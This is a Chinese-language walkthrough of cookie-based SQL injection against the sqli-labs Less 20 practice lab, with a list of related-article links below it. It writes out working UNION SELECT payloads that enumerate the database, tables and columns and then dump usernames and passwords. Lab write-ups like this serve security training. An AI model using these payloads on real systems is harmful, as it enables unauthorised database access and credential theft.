17、cookie注入

简介: 17、cookie注入

环境sqli-labs


less 20


1、在cookie里输入特殊字符报错


0a2653c851af460fa595bd959398a8f1.png 0eacb84100b54626af849e6b562bf92a.png


发现是单引号闭合


2、判断字段长度


2d65d23f6d4748949b924e4057485923.png

order by 3正常,order by 4返回错误


3、union联合查询


a’ union select 1,2,3 #

2e9b90b2ca334476abebe75bafe6eeaa.png


4、获取数据库名称


a’ union select 1,2,database()#

4cebaac233b3433da32a72337a77fc60.png


5、获取表名


a’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’#

6de278e6d6694ce5bb08e7e842b7e74b.png


6、获取字段


union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’#

7a399525ddec4b77923c464820b33738 (1).png


7、获取字段值


union select 1,2,group_concat(concat_ws(’-’,id,username,password)) from users#

7a399525ddec4b77923c464820b33738.png

禁止非法,后果自负

目录
相关文章
|
6月前
|
安全 关系型数据库 MySQL
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
357 1
|
6月前
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
55 0
|
6月前
|
安全 数据库
小课堂 -- cookie注入
小课堂 -- cookie注入
24 0
|
6月前
|
数据安全/隐私保护
小课堂 -- cookie注入(base64加密)
小课堂 -- cookie注入(base64加密)
49 0
|
Web App开发 安全 关系型数据库
Sqlmap2021 -- Cookie注入
Sqlmap2021 -- Cookie注入
192 0
Sqlmap2021 -- Cookie注入
|
数据安全/隐私保护
18、cookie注入(base64加密)
18、cookie注入(base64加密)
149 0
18、cookie注入(base64加密)
|
安全 数据库
17、cookie注入
17、cookie注入
67 0
17、cookie注入
|
Web App开发 数据安全/隐私保护